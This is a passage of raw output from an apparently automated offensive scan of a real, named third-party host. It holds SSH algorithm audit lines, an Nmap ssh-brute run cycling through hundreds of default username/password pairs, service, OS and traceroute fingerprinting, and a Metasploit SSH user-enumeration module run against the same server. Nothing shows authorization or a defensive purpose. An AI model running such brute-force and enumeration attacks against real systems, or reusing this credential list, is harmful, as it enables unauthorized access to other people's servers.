  2467. (rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
  2468. (rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
  2469. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
  2470. (rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
  2471. (rec) -hmac-sha2-512                        -- mac algorithm to remove
  2472. (rec) -umac-128@openssh.com                 -- mac algorithm to remove
  2473. (rec) -hmac-sha2-256                        -- mac algorithm to remove
  2474. (rec) -umac-64@openssh.com                  -- mac algorithm to remove
  2475. (rec) -hmac-sha1                            -- mac algorithm to remove
  2476. (rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
  2477. (rec) -umac-64-etm@openssh.com              -- mac algorithm to remove
  2478.  
  2479.  
  2480. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 13:39 EST
  2481. NSE: [ssh-run] Failed to specify credentials and command to run.
  2482. NSE: [ssh-brute] Trying username/password pair: root:root
  2483. NSE: [ssh-brute] Trying username/password pair: admin:admin
  2484. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  2485. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  2486. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  2487. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  2488. NSE: [ssh-brute] Trying username/password pair: guest:guest
  2489. NSE: [ssh-brute] Trying username/password pair: user:user
  2490. NSE: [ssh-brute] Trying username/password pair: web:web
  2491. NSE: [ssh-brute] Trying username/password pair: test:test
  2492. NSE: [ssh-brute] Trying username/password pair: root:
  2493. NSE: [ssh-brute] Trying username/password pair: admin:
  2494. NSE: [ssh-brute] Trying username/password pair: administrator:
  2495. NSE: [ssh-brute] Trying username/password pair: webadmin:
  2496. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  2497. NSE: [ssh-brute] Trying username/password pair: netadmin:
  2498. NSE: [ssh-brute] Trying username/password pair: guest:
  2499. NSE: [ssh-brute] Trying username/password pair: user:
  2500. NSE: [ssh-brute] Trying username/password pair: web:
  2501. NSE: [ssh-brute] Trying username/password pair: test:
  2502. NSE: [ssh-brute] Trying username/password pair: root:123456
  2503. NSE: [ssh-brute] Trying username/password pair: admin:123456
  2504. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  2505. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  2506. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  2507. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  2508. NSE: [ssh-brute] Trying username/password pair: guest:123456
  2509. NSE: [ssh-brute] Trying username/password pair: user:123456
  2510. NSE: [ssh-brute] Trying username/password pair: web:123456
  2511. NSE: [ssh-brute] Trying username/password pair: test:123456
  2512. NSE: [ssh-brute] Trying username/password pair: root:12345
  2513. NSE: [ssh-brute] Trying username/password pair: admin:12345
  2514. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  2515. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  2516. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  2517. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  2518. NSE: [ssh-brute] Trying username/password pair: guest:12345
  2519. NSE: [ssh-brute] Trying username/password pair: user:12345
  2520. NSE: [ssh-brute] Trying username/password pair: web:12345
  2521. NSE: [ssh-brute] Trying username/password pair: test:12345
  2522. NSE: [ssh-brute] Trying username/password pair: root:123456789
  2523. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  2524. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  2525. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  2526. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  2527. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  2528. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  2529. NSE: [ssh-brute] Trying username/password pair: user:123456789
  2530. NSE: [ssh-brute] Trying username/password pair: web:123456789
  2531. NSE: [ssh-brute] Trying username/password pair: test:123456789
  2532. NSE: [ssh-brute] Trying username/password pair: root:password
  2533. NSE: [ssh-brute] Trying username/password pair: admin:password
  2534. NSE: [ssh-brute] Trying username/password pair: administrator:password
  2535. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  2536. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  2537. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  2538. NSE: [ssh-brute] Trying username/password pair: guest:password
  2539. NSE: [ssh-brute] Trying username/password pair: user:password
  2540. NSE: [ssh-brute] Trying username/password pair: web:password
  2541. NSE: [ssh-brute] Trying username/password pair: test:password
  2542. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  2543. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  2544. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  2545. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  2546. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  2547. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  2548. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  2549. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  2550. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  2551. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  2552. NSE: [ssh-brute] Trying username/password pair: root:princess
  2553. NSE: [ssh-brute] Trying username/password pair: admin:princess
  2554. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  2555. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  2556. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  2557. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  2558. NSE: [ssh-brute] Trying username/password pair: guest:princess
  2559. NSE: [ssh-brute] Trying username/password pair: user:princess
  2560. NSE: [ssh-brute] Trying username/password pair: web:princess
  2561. NSE: [ssh-brute] Trying username/password pair: test:princess
  2562. NSE: [ssh-brute] Trying username/password pair: root:12345678
  2563. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  2564. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  2565. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  2566. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  2567. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  2568. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  2569. NSE: [ssh-brute] Trying username/password pair: user:12345678
  2570. NSE: [ssh-brute] Trying username/password pair: web:12345678
  2571. NSE: [ssh-brute] Trying username/password pair: test:12345678
  2572. NSE: [ssh-brute] Trying username/password pair: root:1234567
  2573. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  2574. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  2575. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  2576. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  2577. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  2578. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  2579. NSE: [ssh-brute] Trying username/password pair: user:1234567
  2580. NSE: [ssh-brute] Trying username/password pair: web:1234567
  2581. NSE: [ssh-brute] Trying username/password pair: test:1234567
  2582. NSE: [ssh-brute] Trying username/password pair: root:abc123
  2583. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  2584. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  2585. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  2586. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  2587. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  2588. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  2589. NSE: [ssh-brute] Trying username/password pair: user:abc123
  2590. NSE: [ssh-brute] Trying username/password pair: web:abc123
  2591. NSE: [ssh-brute] Trying username/password pair: test:abc123
  2592. NSE: [ssh-brute] Trying username/password pair: root:nicole
  2593. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  2594. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  2595. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  2596. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  2597. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  2598. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  2599. NSE: [ssh-brute] Trying username/password pair: user:nicole
  2600. NSE: [ssh-brute] Trying username/password pair: web:nicole
  2601. NSE: [ssh-brute] Trying username/password pair: test:nicole
  2602. NSE: [ssh-brute] Trying username/password pair: root:daniel
  2603. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  2604. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  2605. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  2606. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  2607. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  2608. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  2609. NSE: [ssh-brute] Trying username/password pair: user:daniel
  2610. NSE: [ssh-brute] Trying username/password pair: web:daniel
  2611. NSE: [ssh-brute] Trying username/password pair: test:daniel
  2612. NSE: [ssh-brute] Trying username/password pair: root:monkey
  2613. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  2614. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  2615. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  2616. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  2617. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  2618. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  2619. NSE: [ssh-brute] Trying username/password pair: user:monkey
  2620. NSE: [ssh-brute] Trying username/password pair: web:monkey
  2621. NSE: [ssh-brute] Trying username/password pair: test:monkey
  2622. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  2623. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  2624. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  2625. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  2626. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  2627. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  2628. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  2629. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  2630. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  2631. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  2632. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  2633. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  2634. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  2635. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  2636. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  2637. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  2638. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  2639. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  2640. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  2641. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  2642. NSE: [ssh-brute] Trying username/password pair: root:lovely
  2643. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  2644. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  2645. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  2646. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  2647. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  2648. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  2649. NSE: [ssh-brute] Trying username/password pair: user:lovely
  2650. NSE: [ssh-brute] Trying username/password pair: web:lovely
  2651. NSE: [ssh-brute] Trying username/password pair: test:lovely
  2652. NSE: [ssh-brute] Trying username/password pair: root:654321
  2653. NSE: [ssh-brute] Trying username/password pair: admin:654321
  2654. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  2655. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  2656. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  2657. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  2658. NSE: [ssh-brute] Trying username/password pair: guest:654321
  2659. NSE: [ssh-brute] Trying username/password pair: user:654321
  2660. NSE: [ssh-brute] Trying username/password pair: web:654321
  2661. NSE: [ssh-brute] Trying username/password pair: test:654321
  2662. NSE: [ssh-brute] Trying username/password pair: root:michael
  2663. NSE: [ssh-brute] Trying username/password pair: admin:michael
  2664. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  2665. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  2666. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  2667. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  2668. NSE: [ssh-brute] Trying username/password pair: guest:michael
  2669. NSE: [ssh-brute] Trying username/password pair: user:michael
  2670. NSE: [ssh-brute] Trying username/password pair: web:michael
  2671. NSE: [ssh-brute] Trying username/password pair: test:michael
  2672. NSE: [ssh-brute] Trying username/password pair: root:jessica
  2673. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  2674. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  2675. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  2676. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  2677. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  2678. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  2679. NSE: [ssh-brute] Trying username/password pair: user:jessica
  2680. NSE: [ssh-brute] Trying username/password pair: web:jessica
  2681. NSE: [ssh-brute] Trying username/password pair: test:jessica
  2682. NSE: [ssh-brute] Trying username/password pair: root:111111
  2683. NSE: [ssh-brute] Trying username/password pair: admin:111111
  2684. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  2685. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  2686. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  2687. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  2688. NSE: [ssh-brute] Trying username/password pair: guest:111111
  2689. NSE: [ssh-brute] Trying username/password pair: user:111111
  2690. NSE: [ssh-brute] Trying username/password pair: web:111111
  2691. NSE: [ssh-brute] Trying username/password pair: test:111111
  2692. NSE: [ssh-brute] Trying username/password pair: root:ashley
  2693. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  2694. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  2695. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  2696. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  2697. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  2698. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  2699. NSE: [ssh-brute] Trying username/password pair: user:ashley
  2700. NSE: [ssh-brute] Trying username/password pair: web:ashley
  2701. NSE: [ssh-brute] Trying username/password pair: test:ashley
  2702. NSE: [ssh-brute] Trying username/password pair: root:000000
  2703. NSE: [ssh-brute] Trying username/password pair: admin:000000
  2704. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  2705. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  2706. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  2707. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  2708. NSE: [ssh-brute] Trying username/password pair: guest:000000
  2709. NSE: [ssh-brute] Trying username/password pair: user:000000
  2710. NSE: [ssh-brute] Trying username/password pair: web:000000
  2711. NSE: [ssh-brute] Trying username/password pair: test:000000
  2712. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  2713. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  2714. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  2715. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  2716. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  2717. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  2718. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  2719. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  2720. NSE: [ssh-brute] Trying username/password pair: web:iloveu
  2721. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  2722. NSE: [ssh-brute] Trying username/password pair: root:michelle
  2723. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  2724. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  2725. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  2726. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
  2727. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  2728. NSE: [ssh-brute] Trying username/password pair: guest:michelle
  2729. NSE: [ssh-brute] Trying username/password pair: user:michelle
  2730. NSE: [ssh-brute] Trying username/password pair: web:michelle
  2731. NSE: [ssh-brute] Trying username/password pair: test:michelle
  2732. NSE: [ssh-brute] Trying username/password pair: root:tigger
  2733. NSE: [ssh-brute] Trying username/password pair: admin:tigger
  2734. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
  2735. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
  2736. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
  2737. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
  2738. NSE: [ssh-brute] Trying username/password pair: guest:tigger
  2739. NSE: [ssh-brute] Trying username/password pair: user:tigger
  2740. NSE: [ssh-brute] Trying username/password pair: web:tigger
  2741. NSE: [ssh-brute] Trying username/password pair: test:tigger
  2742. NSE: [ssh-brute] Trying username/password pair: root:sunshine
  2743. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
  2744. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
  2745. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
  2746. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
  2747. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
  2748. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
  2749. NSE: [ssh-brute] Trying username/password pair: user:sunshine
  2750. NSE: [ssh-brute] Trying username/password pair: web:sunshine
  2751. NSE: [ssh-brute] Trying username/password pair: test:sunshine
  2752. NSE: [ssh-brute] Trying username/password pair: root:chocolate
  2753. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
  2754. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
  2755. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
  2756. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
  2757. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
  2758. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
  2759. NSE: [ssh-brute] Trying username/password pair: user:chocolate
  2760. NSE: [ssh-brute] Trying username/password pair: web:chocolate
  2761. NSE: [ssh-brute] Trying username/password pair: test:chocolate
  2762. NSE: [ssh-brute] Trying username/password pair: root:password1
  2763. NSE: [ssh-brute] Trying username/password pair: admin:password1
  2764. NSE: [ssh-brute] Trying username/password pair: administrator:password1
  2765. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
  2766. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
  2767. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
  2768. NSE: [ssh-brute] Trying username/password pair: guest:password1
  2769. NSE: [ssh-brute] Trying username/password pair: user:password1
  2770. NSE: [ssh-brute] Trying username/password pair: web:password1
  2771. NSE: [ssh-brute] Trying username/password pair: test:password1
  2772. NSE: [ssh-brute] Trying username/password pair: root:soccer
  2773. NSE: [ssh-brute] Trying username/password pair: admin:soccer
  2774. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
  2775. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
  2776. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
  2777. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
  2778. NSE: [ssh-brute] Trying username/password pair: guest:soccer
  2779. NSE: [ssh-brute] Trying username/password pair: user:soccer
  2780. NSE: [ssh-brute] Trying username/password pair: web:soccer
  2781. NSE: [ssh-brute] Trying username/password pair: test:soccer
  2782. NSE: [ssh-brute] Trying username/password pair: root:anthony
  2783. NSE: [ssh-brute] Trying username/password pair: admin:anthony
  2784. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
  2785. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
  2786. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
  2787. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
  2788. NSE: [ssh-brute] Trying username/password pair: guest:anthony
  2789. NSE: [ssh-brute] Trying username/password pair: user:anthony
  2790. NSE: [ssh-brute] Trying username/password pair: web:anthony
  2791. NSE: [ssh-brute] Trying username/password pair: test:anthony
  2792. NSE: [ssh-brute] Trying username/password pair: root:friends
  2793. NSE: [ssh-brute] Trying username/password pair: admin:friends
  2794. NSE: [ssh-brute] Trying username/password pair: administrator:friends
  2795. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
  2796. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
  2797. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
  2798. NSE: [ssh-brute] Trying username/password pair: guest:friends
  2799. NSE: [ssh-brute] Trying username/password pair: user:friends
  2800. NSE: [ssh-brute] Trying username/password pair: web:friends
  2801. NSE: [ssh-brute] Trying username/password pair: test:friends
  2802. NSE: [ssh-brute] Trying username/password pair: root:purple
  2803. NSE: [ssh-brute] Trying username/password pair: admin:purple
  2804. NSE: [ssh-brute] Trying username/password pair: administrator:purple
  2805. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
  2806. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
  2807. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
  2808. NSE: [ssh-brute] Trying username/password pair: guest:purple
  2809. NSE: [ssh-brute] Trying username/password pair: user:purple
  2810. NSE: [ssh-brute] Trying username/password pair: web:purple
  2811. NSE: [ssh-brute] Trying username/password pair: test:purple
  2812. NSE: [ssh-brute] Trying username/password pair: root:angel
  2813. NSE: [ssh-brute] Trying username/password pair: admin:angel
  2814. NSE: [ssh-brute] Trying username/password pair: administrator:angel
  2815. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
  2816. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
  2817. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
  2818. NSE: [ssh-brute] Trying username/password pair: guest:angel
  2819. NSE: [ssh-brute] Trying username/password pair: user:angel
  2820. NSE: [ssh-brute] Trying username/password pair: web:angel
  2821. NSE: [ssh-brute] Trying username/password pair: test:angel
  2822. NSE: [ssh-brute] Trying username/password pair: root:butterfly
  2823. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
  2824. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
  2825. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
  2826. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
  2827. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
  2828. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
  2829. NSE: [ssh-brute] Trying username/password pair: user:butterfly
  2830. NSE: [ssh-brute] Trying username/password pair: web:butterfly
  2831. NSE: [ssh-brute] Trying username/password pair: test:butterfly
  2832. NSE: [ssh-brute] Trying username/password pair: root:jordan
  2833. NSE: [ssh-brute] Trying username/password pair: admin:jordan
  2834. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
  2835. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
  2836. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
  2837. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
  2838. NSE: [ssh-brute] Trying username/password pair: guest:jordan
  2839. NSE: [ssh-brute] Trying username/password pair: user:jordan
  2840. NSE: [ssh-brute] Trying username/password pair: web:jordan
  2841. NSE: [ssh-brute] Trying username/password pair: test:jordan
  2842. NSE: [ssh-brute] Trying username/password pair: root:fuckyou
  2843. NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
  2844. NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
  2845. NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
  2846. NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
  2847. Nmap scan report for allthefallen.ninja (178.132.1.137)
  2848. Host is up (0.12s latency).
  2849. rDNS record for 178.132.1.137: server.allthefallen.ninja
  2850.  
  2851. PORT   STATE SERVICE VERSION
  2852. 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
  2853. | ssh-auth-methods:
  2854. |   Supported authentication methods:
  2855. |     publickey
  2856. |_    password
  2857. | ssh-brute:
  2858. |   Accounts: No valid accounts found
  2859. |_  Statistics: Performed 365 guesses in 181 seconds, average tps: 2.1
  2860. | ssh-hostkey:
  2861. |   2048 48:c7:a1:62:f8:fd:71:c6:8b:90:0b:71:c5:ba:2d:86 (RSA)
  2862. |   256 8e:b2:80:91:b3:40:7f:24:86:da:be:24:51:35:1e:de (ECDSA)
  2863. |_  256 25:32:68:65:39:cd:89:03:b7:33:6a:45:84:f1:8b:2c (EdDSA)
  2864. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
  2865. |_ssh-run: Failed to specify credentials and command to run.
  2866. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2867. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.13 (92%), Linux 3.16 (91%), Linux 2.6.39 (91%), Linux 3.10 - 4.8 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 - 4.6 (90%)
  2868. No exact OS matches for host (test conditions non-ideal).
  2869. Network Distance: 11 hops
  2870. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  2871.  
  2872. TRACEROUTE (using port 22/tcp)
  2873. HOP RTT       ADDRESS
  2874. 1   108.71 ms 10.13.0.1
  2875. 2   109.79 ms 37.187.24.253
  2876. 3   109.35 ms 10.50.225.60
  2877. 4   109.53 ms 10.17.129.42
  2878. 5   109.33 ms 10.73.0.52
  2879. 6   ...
  2880. 7   116.57 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  2881. 8   116.30 ms be100-2.ams-1-a9.nl.eu (94.23.122.230)
  2882. 9   217.57 ms 109.236.95.111
  2883. 10  117.32 ms 109.236.95.113
  2884. 11  116.76 ms server.allthefallen.ninja (178.132.1.137)
  2885.  
  2886. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2887. Nmap done: 1 IP address (1 host up) scanned in 210.93 seconds
  2888. 
  2889.  ______________________________________________________________________________
  2890. |                                                                              |
  2891. |                          3Kom SuperHack II Logon                             |
  2892. |______________________________________________________________________________|
  2893. |                                                                              |
  2894. |                                                                              |
  2895. |                                                                              |
  2896. |                 User Name:          [   security    ]                        |
  2897. |                                                                              |
  2898. |                 Password:           [               ]                        |
  2899. |                                                                              |
  2900. |                                                                              |
  2901. |                                                                              |
  2902. |                                   [ OK ]                                     |
  2903. |______________________________________________________________________________|
  2904. |                                                                              |
  2905. |                                                       https://metasploit.com |
  2906. |______________________________________________________________________________|
  2907. 
  2908.  
  2909.        =[ metasploit v4.16.24-dev                         ]
  2910. + -- --=[ 1714 exploits - 973 auxiliary - 300 post        ]
  2911. + -- --=[ 503 payloads - 40 encoders - 10 nops            ]
  2912. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2913.  
  2914. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  2915. RHOSTS => allthefallen.ninja
  2916. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  2917. RHOST => allthefallen.ninja
  2918. [*] 178.132.1.137:22 - SSH - Checking for false positives
  2919. [*] 178.132.1.137:22 - SSH - Starting scan
  2920. [-] 178.132.1.137:22 - SSH - User 'admin' not found
  2921. [-] 178.132.1.137:22 - SSH - User 'administrator' not found
  2922. [-] 178.132.1.137:22 - SSH - User 'anonymous' not found
  2923. [-] 178.132.1.137:22 - SSH - User 'backup' not found
  2924. [-] 178.132.1.137:22 - SSH - User 'bee' not found
  2925. [-] 178.132.1.137:22 - SSH - User 'ftp' not found
  2926. [-] 178.132.1.137:22 - SSH - User 'guest' not found
  2927. [-] 178.132.1.137:22 - SSH - User 'GUEST' not found
  2928. [-] 178.132.1.137:22 - SSH - User 'info' not found
  2929. [-] 178.132.1.137:22 - SSH - User 'mail' not found
  2930. [-] 178.132.1.137:22 - SSH - User 'mailadmin' not found
  2931. [-] 178.132.1.137:22 - SSH - User 'msfadmin' not found
  2932. [-] 178.132.1.137:22 - SSH - User 'mysql' not found
  2933. [-] 178.132.1.137:22 - SSH - User 'nobody' not found
  2934. [-] 178.132.1.137:22 - SSH - User 'oracle' not found
  2935. [-] 178.132.1.137:22 - SSH - User 'owaspbwa' not found
  2936. [-] 178.132.1.137:22 - SSH - User 'postfix' not found
  2937. [-] 178.132.1.137:22 - SSH - User 'postgres' not found
  2938. [-] 178.132.1.137:22 - SSH - User 'private' not found
  2939. [-] 178.132.1.137:22 - SSH - User 'proftpd' not found
  2940. [-] 178.132.1.137:22 - SSH - User 'public' not found
  2941. [-] 178.132.1.137:22 - SSH - User 'root' not found
  2942. [-] 178.132.1.137:22 - SSH - User 'superadmin' not found
  2943. [-] 178.132.1.137:22 - SSH - User 'support' not found
  2944. [-] 178.132.1.137:22 - SSH - User 'sys' not found
  2945. [-] 178.132.1.137:22 - SSH - User 'system' not found
  2946. [-] 178.132.1.137:22 - SSH - User 'systemadmin' not found
  2947. [-] 178.132.1.137:22 - SSH - User 'systemadministrator' not found
  2948. [-] 178.132.1.137:22 - SSH - User 'test' not found
